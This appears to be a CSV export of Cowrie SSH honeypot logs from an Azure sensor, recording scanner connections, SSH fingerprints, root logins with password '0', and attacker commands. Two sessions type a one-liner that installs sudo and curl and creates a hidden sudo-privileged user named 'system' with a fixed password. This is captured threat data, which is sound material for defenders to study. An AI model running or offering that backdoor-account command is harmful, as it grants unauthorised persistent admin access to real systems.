cCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.297675Z"",""src_ip"":""45.79.181.104"",""session"":""36f4dcfabbcb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.311 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.021878719329833984,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.310421Z"",""src_ip"":""45.79.181.104"",""session"":""36f4dcfabbcb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.319 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""45.79.181.104"",""src_port"":34906,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""e42ac17da468"",""protocol"":""ssh"",""message"":""New connection: 45.79.181.104:34906 (10.0.0.4:2222) [session: e42ac17da468]"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.318670Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.320 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.320151Z"",""src_ip"":""45.79.181.104"",""session"":""e42ac17da468""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.330 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""ssh-ed25519-cert-v01@openssh.com"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.328926Z"",""src_ip"":""45.79.181.104"",""session"":""e42ac17da468""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:18:28.345 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.024108409881591797,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:18:28.344269Z"",""src_ip"":""45.79.181.104"",""session"":""e42ac17da468""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:50.532 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""183.81.169.238"",""src_port"":34336,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""5a4a09281265"",""protocol"":""ssh"",""message"":""New connection: 183.81.169.238:34336 (10.0.0.4:2222) [session: 5a4a09281265]"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:50.531779Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:50.870 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:50.870019Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:50.873 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:50.871273Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:52.879 PM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""0"",""message"":""login attempt [root/0] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:52.878315Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:53.657 PM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:53.655392Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:53.657 PM",,"{""eventid"":""cowrie.command.input"",""input"":""apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 NySjR8WR) system && sudo usermod -aG sudo system"",""message"":""CMD: apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 NySjR8WR) system && sudo usermod -aG sudo system"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:53.656569Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:53.658 PM",,"{""eventid"":""cowrie.command.input"",""input"":""openssl passwd -1 NySjR8WR"",""message"":""CMD: openssl passwd -1 NySjR8WR"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:53.657647Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:53.659 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""openssl passwd -1 NySjR8WR"",""message"":""Command not found: openssl passwd -1 NySjR8WR"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:53.659012Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:53.662 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt update"",""message"":""Command not found: apt update"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:53.661295Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:53.663 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt install sudo curl -y"",""message"":""Command not found: apt install sudo curl -y"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:53.662771Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:54.384 PM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/d09f1be4445e8c75b43018bd26e56f49beb887367024614e8cd836eafa831894"",""size"":725,""shasum"":""d09f1be4445e8c75b43018bd26e56f49beb887367024614e8cd836eafa831894"",""duplicate"":false,""duration"":0.7269351482391357,""message"":""Closing TTY Log: var/lib/cowrie/tty/d09f1be4445e8c75b43018bd26e56f49beb887367024614e8cd836eafa831894 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:54.382066Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 7:52:54.385 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.851876974105835,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T19:52:54.385011Z"",""src_ip"":""183.81.169.238"",""session"":""5a4a09281265""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:30:41.696 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""167.172.151.86"",""src_port"":58380,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""960d95d8a6d2"",""protocol"":""ssh"",""message"":""New connection: 167.172.151.86:58380 (10.0.0.4:2222) [session: 960d95d8a6d2]"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:30:41.695090Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:30:41.706 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-libssh-0.1"",""message"":""Remote SSH version: SSH-2.0-libssh-0.1"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:30:41.705383Z"",""src_ip"":""167.172.151.86"",""session"":""960d95d8a6d2""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:30:41.716 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.01883530616760254,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:30:41.715441Z"",""src_ip"":""167.172.151.86"",""session"":""960d95d8a6d2""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:52.579 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""183.81.169.238"",""src_port"":51282,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""54b8d50b91cb"",""protocol"":""ssh"",""message"":""New connection: 183.81.169.238:51282 (10.0.0.4:2222) [session: 54b8d50b91cb]"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:52.578328Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:52.652 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:52.651834Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:52.698 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:52.696363Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.090 PM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""0"",""message"":""login attempt [root/0] succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.089621Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.356 PM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.355158Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.357 PM",,"{""eventid"":""cowrie.command.input"",""input"":""apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 w8KjwZAx) system && sudo usermod -aG sudo system"",""message"":""CMD: apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 w8KjwZAx) system && sudo usermod -aG sudo system"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.356500Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.358 PM",,"{""eventid"":""cowrie.command.input"",""input"":""openssl passwd -1 w8KjwZAx"",""message"":""CMD: openssl passwd -1 w8KjwZAx"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.357695Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.359 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""openssl passwd -1 w8KjwZAx"",""message"":""Command not found: openssl passwd -1 w8KjwZAx"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.359177Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.362 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt update"",""message"":""Command not found: apt update"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.361500Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.363 PM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt install sudo curl -y"",""message"":""Command not found: apt install sudo curl -y"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.363209Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.450 PM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/2496cf54ff2ec11e9352e1664f905ee3e27899d682046033a59ad423e8e1fa81"",""size"":725,""shasum"":""2496cf54ff2ec11e9352e1664f905ee3e27899d682046033a59ad423e8e1fa81"",""duplicate"":false,""duration"":0.09480786323547363,""message"":""Closing TTY Log: var/lib/cowrie/tty/2496cf54ff2ec11e9352e1664f905ee3e27899d682046033a59ad423e8e1fa81 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.449580Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 9:39:53.454 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.8723883628845215,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T21:39:53.452134Z"",""src_ip"":""183.81.169.238"",""session"":""54b8d50b91cb""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:00:10.915 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":120.08077883720398,""message"":""Connection lost after 120 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:00:10.914662Z"",""src_ip"":""42.240.129.244"",""session"":""0d826c74bc43""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:41:16.840 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""205.210.31.91"",""src_port"":60270,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1730f346a603"",""protocol"":""ssh"",""message"":""New connection: 205.210.31.91:60270 (10.0.0.4:2222) [session: 1730f346a603]"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:41:16.837358Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:41:17.556 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-ZGrab ZGrab SSH Survey"",""message"":""Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:41:17.555184Z"",""src_ip"":""205.210.31.91"",""session"":""1730f346a603""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:41:18.458 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""dd9bcf093c355da7000132131cb36fd0"",""hasshAlgorithms"":""diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib"",""kexAlgs"":[""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group-exchange-sha1"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-ed25519-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ssh-rsa-cert-v00@openssh.com"",""ssh-dss-cert-v00@openssh.com"",""ssh-ed25519"",""ssh-rsa"",""ssh-dss""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""arcfour256"",""arcfour128"",""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-cbc"",""3des-cbc"",""blowfish-cbc"",""cast128-cbc"",""aes192-cbc"",""aes256-cbc"",""arcfour"",""rijndael-cbc@lysator.liu.se""],""macCS"":[""hmac-md5-etm@openssh.com"",""hmac-sha1-etm@openssh.com"",""umac-64-etm@openssh.com"",""umac-128-etm@openssh.com"",""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-ripemd160-etm@openssh.com"",""hmac-sha1-96-etm@openssh.com"",""hmac-md5-96-etm@openssh.com"",""hmac-md5"",""hmac-sha1"",""umac-64@openssh.com"",""umac-128@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-ripemd160"",""hmac-ripemd160@openssh.com"",""hmac-sha1-96"",""hmac-md5-96""],""compCS"":[""none"",""zlib@openssh.com"",""zlib""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:41:18.455639Z"",""src_ip"":""205.210.31.91"",""session"":""1730f346a603""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:41:21.155 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":4.313709497451782,""message"":""Connection lost after 4 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T22:41:21.154905Z"",""src_ip"":""205.210.31.91"",""session"":""1730f346a603""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 11:06:30.287 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""194.169.175.106"",""src_port"":55220,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""b6ffce5f261f"",""protocol"":""ssh"",""message"":""New connection: 194.169.175.106:55220 (10.0.0.4:2222) [session: b6ffce5f261f]"",""sensor"":""server01"",""timestamp"":""2024-09-20T23:06:30.285836Z""} 